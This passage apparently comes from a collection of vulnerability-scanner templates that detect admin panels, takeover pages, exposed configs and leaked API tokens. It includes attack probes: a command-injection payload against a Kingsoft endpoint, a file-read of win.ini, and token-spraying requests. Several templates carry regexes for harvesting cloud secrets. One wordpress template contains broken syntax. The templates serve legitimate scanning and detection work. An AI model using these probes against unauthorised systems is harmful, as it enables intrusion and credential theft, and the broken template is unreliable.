pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - Oops - We didn't find your site. -------------------------------------------------------------------------------- /zoho-webhook-token.yaml: -------------------------------------------------------------------------------- 1 | id: zoho-webhook-token 2 | 3 | info: 4 | name: Zoho Webhook Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,zoho 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - 'https://creator\.zoho\.com/api/[A-Za-z0-9/\-_\.]+\?authtoken=[A-Za-z0-9]+' 18 | -------------------------------------------------------------------------------- /agilecrm-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: agilecrm-takeover 2 | 3 | info: 4 | name: agilecrm takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - Sorry, this page is no longer available. -------------------------------------------------------------------------------- /aha-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: aha-takeover 2 | 3 | info: 4 | name: Aha Takeover Detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - There is no portal here ... sending you back to Aha! -------------------------------------------------------------------------------- /aws/aws-access-key-value.yaml: -------------------------------------------------------------------------------- 1 | id: aws-access-key-value 2 | 3 | info: 4 | name: AWS Access Key ID Value 5 | author: Swissky 6 | severity: info 7 | tags: exposure,token,aws,amazon 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" 19 | -------------------------------------------------------------------------------- /braintree-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: braintree-access-token 2 | 3 | info: 4 | name: PayPal Braintree Access Token Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,paypal 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - 'access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}' 18 | -------------------------------------------------------------------------------- /c-unauthorized/jeecg-boot.yaml: -------------------------------------------------------------------------------- 1 | id: jeecg-boot-unauth 2 | 3 | info: 4 | name: Jeecg Boot Unauth 5 | author: zan8in 6 | severity: high 7 | verified: true 8 | description: | 9 | fofa: title="Jeecg-Boot" 10 | 11 | rules: 12 | r0: 13 | request: 14 | method: GET 15 | path: /jeecg-boot/ 16 | expression: response.status == 200 && response.body.bcontains(b'Swagger-Bootstrap-UI') 17 | expression: r0() -------------------------------------------------------------------------------- /c-unauthorized/ruoyi-druid-unauth.yaml: -------------------------------------------------------------------------------- 1 | id: ruoyi-druid-unauth 2 | 3 | info: 4 | name: 若依管理系统未授权访问 5 | author: Str1am 6 | severity: high 7 | verified: true 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: GET 13 | path: /prod-api/druid/websession.html 14 | expression: response.status == 200 && response.body.bcontains(b'Druid Web Session Stat') && response.body.bcontains(b'Web Session Stat') 15 | expression: r0() -------------------------------------------------------------------------------- /cloudinary-credentials.yaml: -------------------------------------------------------------------------------- 1 | id: cloudinary-credentials 2 | 3 | info: 4 | name: Cloudinary Credentials Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,cloudinary 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - 'cloudinary://[0-9]+:[A-Za-z0-9\-_\.]+@[A-Za-z0-9\-_\.]+' -------------------------------------------------------------------------------- /e-vulnerability/svn-leak.yaml: -------------------------------------------------------------------------------- 1 | id: svn-leak 2 | 3 | info: 4 | name: SVM 代码托管泄漏 5 | author: zan8in 6 | severity: high 7 | verified: true 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: GET 13 | path: /.svn/entries 14 | expression: response.status == 200 && ("file\n".bmatches(response.body) || "dir\n".bmatches(response.body)) && "([0-9]){4}-([0-9]){2}-([0-9]){2}(.*)Z\n".bmatches(response.body) 15 | expression: r0() -------------------------------------------------------------------------------- /empirecms-detect.yaml: -------------------------------------------------------------------------------- 1 | id: empirecms-detect 2 | 3 | info: 4 | name: EmpireCMS Detect 5 | author: princechaddha 6 | severity: info 7 | metadata: 8 | shodan-query: http.html:EmpireCMS 9 | tags: tech,empirecms 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: regex 18 | part: body 19 | regex: 20 | - '' 21 | -------------------------------------------------------------------------------- /hmc-hybris-panel.yaml: -------------------------------------------------------------------------------- 1 | id: hmc-hybris-panel 2 | 3 | info: 4 | name: SAP Hybris Management Console 5 | author: dogasantos 6 | severity: info 7 | tags: panel,sap 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/hmc/hybris" 13 | - "{{BaseURL}}/hybris/hmc/hybris" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - "hybris Management Console" 19 | part: body 20 | -------------------------------------------------------------------------------- /pentaho-panel.yaml: -------------------------------------------------------------------------------- 1 | id: pentaho-panel 2 | 3 | info: 4 | name: Pentaho Panel 5 | author: princechaddha,dhiyaneshDK 6 | severity: info 7 | metadata: 8 | shodan-query: pentaho 9 | tags: panel,pentaho 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/pentaho/Login' 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - 'Pentaho User Console - Login' 20 | -------------------------------------------------------------------------------- /perl-status.yaml: -------------------------------------------------------------------------------- 1 | id: perl-status 2 | 3 | info: 4 | name: Apache mod_perl Status Page Exposure 5 | author: pdteam 6 | severity: medium 7 | tags: config,exposure,apache,status 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/perl-status' 13 | matchers: 14 | - type: word 15 | words: 16 | - "Apache2::Status" 17 | - "Perl version" 18 | condition: and 19 | -------------------------------------------------------------------------------- /sap-router.yaml: -------------------------------------------------------------------------------- 1 | id: sap-router 2 | 3 | info: 4 | name: SAPRouter Detection 5 | author: randomstr1ng 6 | severity: info 7 | tags: network,sap 8 | 9 | network: 10 | - inputs: 11 | - data: 57484f415245594f553f0a 12 | type: hex 13 | 14 | host: 15 | - "{{Hostname}}" 16 | - "{{Host}}:3299" 17 | read-size: 1024 18 | 19 | matchers: 20 | - type: word 21 | words: 22 | - "SAProuter" -------------------------------------------------------------------------------- /struts-debug-mode.yaml: -------------------------------------------------------------------------------- 1 | id: struts-debug-mode 2 | 3 | info: 4 | name: Apache Struts setup in Debug-Mode 5 | author: pdteam 6 | severity: low 7 | tags: logs,struts,apache,exposure,setup 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "<debug>" 18 | - "<struts.actionMapping>" 19 | condition: and 20 | -------------------------------------------------------------------------------- /symfony/symfony-detect.yaml: -------------------------------------------------------------------------------- 1 | id: symfony-detect 2 | info: 3 | name: Detect Symfony Software 4 | author: grant 5 | severity: info 6 | requests: 7 | - method: GET 8 | path: 9 | - "{{BaseURL}}/_fragment" 10 | matchers-condition: and 11 | matchers: 12 | - type: status 13 | status: 14 | - 403 15 | - type: word 16 | words: 17 | - "The Symfony Project" 18 | part: all 19 | -------------------------------------------------------------------------------- /vend-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: vend-takeover 2 | 3 | info: 4 | name: vend takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - Looks like you've traveled too far into cyberspace. -------------------------------------------------------------------------------- /zentral-detection.yaml: -------------------------------------------------------------------------------- 1 | id: zentral-detection 2 | 3 | info: 4 | name: Zentral Detection 5 | author: Adam Crosser 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/' 13 | redirects: true 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - '<title>Zentral' 19 | - '<div class="panel-footer btn-group btn-group-justified"' 20 | -------------------------------------------------------------------------------- /a-fingerprinting/minio-browser.yaml: -------------------------------------------------------------------------------- 1 | id: minio-browser 2 | 3 | info: 4 | name: MinIO Browser 5 | author: pikpikcu 6 | severity: info 7 | verified: true 8 | description: | 9 | shodan-query: title:"MinIO Browser" 10 | 11 | rules: 12 | r0: 13 | request: 14 | method: GET 15 | path: /minio/login 16 | expression: response.status == 200 && response.body.ibcontains(b'<title>minio browser') 17 | expression: r0() -------------------------------------------------------------------------------- /checkmarx-panel.yaml: -------------------------------------------------------------------------------- 1 | id: checkmarx-panel-detect 2 | 3 | info: 4 | name: Checkmarx WebClient detector 5 | author: joanbono 6 | severity: info 7 | tags: panel,checkmarx 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/cxwebclient/Login.aspx" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - '/CxWebClient/webApp/Scripts/libs/authenticationScripts' 18 | part: body 19 | -------------------------------------------------------------------------------- /drupal/drupal-install.yaml: -------------------------------------------------------------------------------- 1 | id: drupal-install 2 | 3 | info: 4 | name: Drupal Install 5 | author: NkxxkN 6 | severity: low 7 | tags: exposure,drupal 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/install.php?profile=default" 13 | 14 | redirects: true 15 | max-redirects: 1 16 | matchers: 17 | - type: word 18 | words: 19 | - "Choose language | Drupal" 20 | -------------------------------------------------------------------------------- /google/google-mapsembed.yaml: -------------------------------------------------------------------------------- 1 | id: api-googlemapsembed 2 | 3 | info: 4 | name: Google Maps Embed API Test 5 | author: zzeitlin 6 | severity: info 7 | tags: token-spray,google,maps,embed 8 | 9 | self-contained: true 10 | requests: 11 | - method: GET 12 | path: 13 | - "https://www.google.com/maps/embed/v1/place?q=Seattle&key={{token}}" 14 | 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | -------------------------------------------------------------------------------- /helpjuice-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: helpjuice-takeover 2 | 3 | info: 4 | name: helpjuice takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - We could not find what you're looking for. -------------------------------------------------------------------------------- /jiva-admin-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: active-admin-exposure 2 | 3 | info: 4 | name: ActiveAdmin Admin Dasboard Exposure 5 | author: pdteam 6 | severity: info 7 | tags: panel 8 | #Try This /admin;/main.jsp 9 | 10 | requests: 11 | - raw: 12 | - | 13 | GET /admin/login.jsp HTTP/1.1 14 | Host: {{Hostname}} 15 | matchers: 16 | - type: word 17 | words: 18 | - "Jive Administration Console" -------------------------------------------------------------------------------- /netscalar-aaa-login.yaml: -------------------------------------------------------------------------------- 1 | id: netscalar-aaa-login 2 | 3 | info: 4 | name: NetScalar AAA Login Panel 5 | author: dhiyaneshDk 6 | severity: info 7 | reference: https://www.exploit-db.com/ghdb/6898 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/logon/LogonPoint/tmindex.html' 13 | matchers: 14 | - type: word 15 | words: 16 | - "NetScaler AAA" 17 | condition: and 18 | -------------------------------------------------------------------------------- /sonicwall-management-panel.yaml: -------------------------------------------------------------------------------- 1 | id: sonicwall-management-panel 2 | 3 | info: 4 | name: SonicWall Management Panel 5 | author: PR3R00T 6 | severity: info 7 | tags: panel,sonicwall 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/auth.html" 13 | matchers: 14 | - type: word 15 | words: 16 | - "SonicWall - Authentication" 17 | - "SonicWall Administrator" 18 | -------------------------------------------------------------------------------- /wishpond-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: wishpond-takeover 2 | 3 | info: 4 | name: wishpond takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - https://www.wishpond.com/404?campaign=true -------------------------------------------------------------------------------- /X-Remote-IP.yaml: -------------------------------------------------------------------------------- 1 | id: x-remote-ip 2 | 3 | info: 4 | name: x-remote-ip 5 | author: Kabilan S 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | # Example of sending some headers to the servers 11 | headers: 12 | 13 | X-Remote-IP: "evil.com" 14 | path: 15 | - "{{BaseURL}}/" 16 | matchers: 17 | - type: word 18 | words: 19 | - "evil.com_is_back.__we_get_it.__check_back_daily" 20 | -------------------------------------------------------------------------------- /a-fingerprinting/thinkphp-detect.yaml: -------------------------------------------------------------------------------- 1 | id: thinkphp-detect 2 | 3 | info: 4 | name: ThinkPHP detect 5 | author: zan8in 6 | severity: info 7 | verified: true 8 | description: fofa app="ThinkPHP" 9 | 10 | rules: 11 | r0: 12 | request: 13 | method: GET 14 | path: /index.php?m=1 15 | expression: '"ThinkPHP([0-9]+.[0-9]+.[0-9]+)".bmatches(response.body)' 16 | expression: r0() 17 | -------------------------------------------------------------------------------- /a-fingerprinting/wayos-panel.yaml: -------------------------------------------------------------------------------- 1 | id: wayos-panel 2 | 3 | info: 4 | name: WAYOS-智能路由管理系统 5 | author: zan8in 6 | severity: info 7 | verified: true 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: GET 13 | path: /login.html 14 | follow_redirects: true 15 | expression: | 16 | response.status == 200 && response.body.bcontains(b'维盟(WayOS)') && response.body.bcontains(b'www.wayos.cn') 17 | 18 | expression: r0() -------------------------------------------------------------------------------- /airflow-configuration-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: airflow-configuration-exposure 2 | 3 | info: 4 | name: Apache Airflow Configuration Exposure 5 | author: pdteam 6 | severity: medium 7 | tags: exposure,config,airflow,apache 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/airflow.cfg' 13 | matchers: 14 | - type: word 15 | words: 16 | - '[core]' 17 | - '[api]' 18 | condition: and -------------------------------------------------------------------------------- /apache/apache-dubbo-detect.yaml: -------------------------------------------------------------------------------- 1 | id: apache-dubbo-detect 2 | 3 | info: 4 | name: Apache dubbo detect 5 | author: ffffffff0x 6 | severity: info 7 | metadata: 8 | fofa-query: app="APACHE-dubbo" 9 | tags: apache,dubbo,tech 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | part: header 19 | words: 20 | - "Basic realm=\"dubbo\"" 21 | -------------------------------------------------------------------------------- /cve/2020/CNVD-2020-57264.yaml: -------------------------------------------------------------------------------- 1 | id: CNVD-2020-57264 2 | 3 | info: 4 | name: e-zkeco-CNVD-2020-57264-read-file 5 | author: ThestaRY (https://github.com/ThestaRY7/) 6 | severity: high 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /iclock/ccccc/windows/win.ini 13 | expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") 14 | expression: r0() 15 | 16 | -------------------------------------------------------------------------------- /cx-cloud-upload-detect.yaml: -------------------------------------------------------------------------------- 1 | id: cx-cloud-upload-detect 2 | 3 | info: 4 | name: CX Cloud Unauthenticated Upload Detect 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: upload 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/upload.jsp' 13 | matchers: 14 | - type: word 15 | words: 16 | - "Display file upload form to the user" 17 | condition: and 18 | -------------------------------------------------------------------------------- /default-iis7-page.yaml: -------------------------------------------------------------------------------- 1 | id: default-iis7-page 2 | 3 | info: 4 | name: IIS-7 Default Page 5 | author: dhiyaneshDk 6 | severity: info 7 | reference: 8 | - https://www.shodan.io/search?query=http.title%3A%22IIS7%22 9 | tags: tech,iis 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}' 15 | matchers: 16 | - type: word 17 | words: 18 | - "IIS7" 19 | part: body 20 | -------------------------------------------------------------------------------- /e-vulnerability/wordpress-wpconfig-inclosure.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-wpconfig-inclosure 2 | 3 | info: 4 | name: Wordpress wpconfig disclosure 5 | author: zhizhuo 6 | severity: high 7 | verified: true 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: GET 13 | path: /wp-config.php.save 14 | expression: response.status = 200 && response.body.bcontais(b'define') && response.body.bcontais(b'SECURE_AUTH_KEY') 15 | expression: r0() -------------------------------------------------------------------------------- /emqx-detection.yaml: -------------------------------------------------------------------------------- 1 | id: emqx-detection 2 | 3 | info: 4 | name: Emqx Detection 5 | author: For3stCo1d 6 | severity: info 7 | tags: tech,emqx 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/static/emq.ico" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: dsl 17 | name: favicon 18 | dsl: 19 | - "status_code==200 && ('-670975485' == mmh3(base64_py(body)))" 20 | -------------------------------------------------------------------------------- /fcm-server-key.yaml: -------------------------------------------------------------------------------- 1 | id: fcm-server-key 2 | 3 | info: 4 | name: FCM Server Key 5 | author: absshax 6 | severity: high 7 | reference: 8 | - https://abss.me/posts/fcm-takeover 9 | tags: exposure,token,google 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | extractors: 17 | - type: regex 18 | part: body 19 | regex: 20 | - "AAAA[a-zA-Z0-9_-]{7}:[a-zA-Z0-9_-]{140}" -------------------------------------------------------------------------------- /google/google-calendar-link.yaml: -------------------------------------------------------------------------------- 1 | id: google-calendar-link 2 | 3 | info: 4 | name: Google Calendar URI Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,google 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - 'https://www\.google\.com/calendar/embed\?src=[A-Za-z0-9%@&;=\-_\./]+' -------------------------------------------------------------------------------- /hashicorp-consul-version.yaml: -------------------------------------------------------------------------------- 1 | id: hashicorp-consul-version 2 | 3 | info: 4 | name: Hashicorp Consul Version Detection 5 | author: c-sh0 6 | severity: info 7 | description: Obtain Consul Version Information 8 | tags: tech,consul,api 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/v1/agent/self" 14 | 15 | extractors: 16 | - type: json 17 | json: 18 | - " .Config.Version" 19 | 20 | -------------------------------------------------------------------------------- /jetbrains-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: jetbrains-takeover 2 | 3 | info: 4 | name: jetbrains takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover,jetbrains 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | matchers: 16 | - type: word 17 | words: 18 | - is not a registered InCloud YouTrack. 19 | -------------------------------------------------------------------------------- /unbounce-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: unbounce-takeover 2 | 3 | info: 4 | name: unbounce takeover detection 5 | author: pdcommunity 6 | severity: info 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: regex 17 | regex: 18 | - "^The requested URL was not found on this server.$" -------------------------------------------------------------------------------- /wangshen-file.yaml: -------------------------------------------------------------------------------- 1 | id: wangshen-file-xielu 2 | 3 | info: 4 | name: wangshen-file-xielu 5 | author: str1am 6 | severity: high 7 | reference: 8 | - http://www.2cto.com/article/201405/304552.html 9 | tags: wangshen,file 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "/boot/phpConfig/tb_admin.txt" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 -------------------------------------------------------------------------------- /Airflow-unauthorized.yaml: -------------------------------------------------------------------------------- 1 | id: Airflow-unauthorized 2 | 3 | info: 4 | name: Airflow未授权访问 5 | author: Str1am 6 | severity: high 7 | reference: http://www.str1am.top 8 | tags: Airflow,unauthorized 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/admin/" 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "Airflow - DAGs" 19 | condition: and 20 | -------------------------------------------------------------------------------- /airee-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: airee-takeover 2 | 3 | info: 4 | name: Airee Takeover Detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | name: airee 19 | words: 20 | - 'Ошибка 402. Сервис Айри.рф не оплачен' -------------------------------------------------------------------------------- /cx-cloud-login-1.yaml: -------------------------------------------------------------------------------- 1 | id: cx-cloud-login1 2 | 3 | info: 4 | name: CX Cloud 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: panel 8 | 9 | 10 | requests: 11 | - raw: 12 | - | 13 | GET / HTTP/1.1 14 | Host: {{Hostname}} 15 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 16 | matchers: 17 | - type: word 18 | words: 19 | - "CX Cloud" -------------------------------------------------------------------------------- /e-vulnerability/kingsoft-v8-rce.yaml: -------------------------------------------------------------------------------- 1 | id: kingsoft-v8-rce 2 | 3 | info: 4 | name: 金山 V8 终端安全系统 pdf_maker.php 命令执行漏洞 5 | author: zan8in 6 | severity: critical 7 | verified: false 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: POST 13 | path: /inter/pdf_maker.php 14 | body: "url=IiB8fCBpcGNvbmZpZyB8fA%3D%3D&fileName=xxx" 15 | expression: response.status == 200 && response.body.bcontains(b'Windows IP') 16 | expression: r0() -------------------------------------------------------------------------------- /e-vulnerability/thinkcmf-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: thinkcmf-lfi 2 | 3 | info: 4 | name: Thinkcmf lfi 5 | author: JerryKing 6 | severity: high 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /?a=display&templateFile=README.md 13 | expression: response.status == 200 && response.body.bcontains(bytes(string(b"ThinkCMF"))) && response.body.bcontains(bytes(string(b"## README"))) 14 | expression: r0() 15 | -------------------------------------------------------------------------------- /elmah-log-file.yaml: -------------------------------------------------------------------------------- 1 | id: elmah-log-file 2 | 3 | info: 4 | name: elmah.axd Disclosure 5 | author: shine 6 | severity: medium 7 | tags: logs,exposure 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/elmah.axd" 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | words: 19 | - 'Error Log for' 20 | 21 | - type: status 22 | status: 23 | - 200 -------------------------------------------------------------------------------- /gradle-enterprise-build-cache-detect.yaml: -------------------------------------------------------------------------------- 1 | id: gradle-enterprise-build-cache-detect 2 | 3 | info: 4 | name: Gradle Enterprise Build Cache Node Detection 5 | author: Adam Crosser 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/' 13 | redirects: true 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - 'Gradle Enterprise Build Cache Node' 19 | -------------------------------------------------------------------------------- /helpscout-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: helpscout-takeover 2 | 3 | info: 4 | name: helpscout takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | 18 | - type: word 19 | words: 20 | - "No settings were found for this company:" -------------------------------------------------------------------------------- /misconfigured-concrete5.yaml: -------------------------------------------------------------------------------- 1 | id: misconfigured-concrete5 2 | 3 | info: 4 | name: Misconfigured Concrete5 5 | author: pdteam 6 | severity: low 7 | tags: misconfig,concrete,cms 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | redirects: true 15 | max-redirects: 2 16 | matchers: 17 | - type: word 18 | part: body 19 | words: 20 | - 'concrete5 has encountered an issue' -------------------------------------------------------------------------------- /network-camera-detect.yaml: -------------------------------------------------------------------------------- 1 | id: network-camera-detect 2 | 3 | info: 4 | name: Various Online Devices Detection (Network Camera) 5 | author: iamthefrogy 6 | severity: info 7 | tags: iot 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/CgiStart?page=Single" 13 | redirects: true 14 | max-redirects: 2 15 | matchers: 16 | - type: word 17 | words: 18 | - Network Camera 19 | -------------------------------------------------------------------------------- /ngrok-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: ngrok-takeover 2 | 3 | info: 4 | name: ngrok takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - ngrok.io not found 20 | - Tunnel *.ngrok.io not found -------------------------------------------------------------------------------- /rails-debug-mode.yaml: -------------------------------------------------------------------------------- 1 | id: rails-debug-mode 2 | 3 | info: 4 | name: Rails Debug Mode 5 | author: pdteam 6 | severity: medium 7 | tags: debug,rails,exposure 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/{{randstr}}" 13 | 14 | matchers: 15 | - type: word 16 | part: body 17 | words: 18 | - "Rails.root:" 19 | - "Action Controller: Exception caught" 20 | condition: and -------------------------------------------------------------------------------- /slack-webhook-token.yaml: -------------------------------------------------------------------------------- 1 | id: slack-webhook-token 2 | 3 | info: 4 | name: Slack Webhook Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,slack 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - "https://hooks\\.slack\\.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}" -------------------------------------------------------------------------------- /somfy-login.yaml: -------------------------------------------------------------------------------- 1 | id: somfy-login 2 | 3 | info: 4 | name: Somfy Login Page 5 | author: DhiyaneshDK 6 | severity: info 7 | tags: panel,login 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/m_login.htm' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - Home motion by Somfy 19 | 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /amazon-mws-auth-token.yaml: -------------------------------------------------------------------------------- 1 | id: amazon-mws-auth-token 2 | 3 | info: 4 | name: Amazon MWS Auth Token 5 | author: puzzlepeaches 6 | severity: info 7 | tags: exposure,token,aws,amazon,auth 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" 19 | -------------------------------------------------------------------------------- /api/api-c99.yaml: -------------------------------------------------------------------------------- 1 | id: api-c99 2 | 3 | info: 4 | name: C99 API Test 5 | author: 0ri2N 6 | severity: info 7 | reference: 8 | - https://api.c99.nl 9 | tags: c99,api,dns,token-spray 10 | 11 | self-contained: true 12 | requests: 13 | - method: GET 14 | path: 15 | - https://api.c99.nl/ping?key={{token}}&host=1.1.1.1 16 | 17 | matchers: 18 | - type: word 19 | part: body 20 | words: 21 | - "PING 1.1.1.1" 22 | -------------------------------------------------------------------------------- /citrix-adc-gateway-detect.yaml: -------------------------------------------------------------------------------- 1 | id: citrix-adc-gateway-panel 2 | 3 | info: 4 | name: Citrix ADC Gateway detect 5 | author: organiccrap 6 | severity: info 7 | tags: panel,citrix 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/logon/LogonPoint/index.html' 13 | - '{{BaseURL}}/logon/LogonPoint/custom.html' 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - '_ctxstxt_CitrixCopyright' 19 | -------------------------------------------------------------------------------- /cve/2021/CVE-2021-29622.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2021-29622 2 | 3 | info: 4 | name: Prometheus v2.23.0 to v2.26.0, and v2.27.0 Open 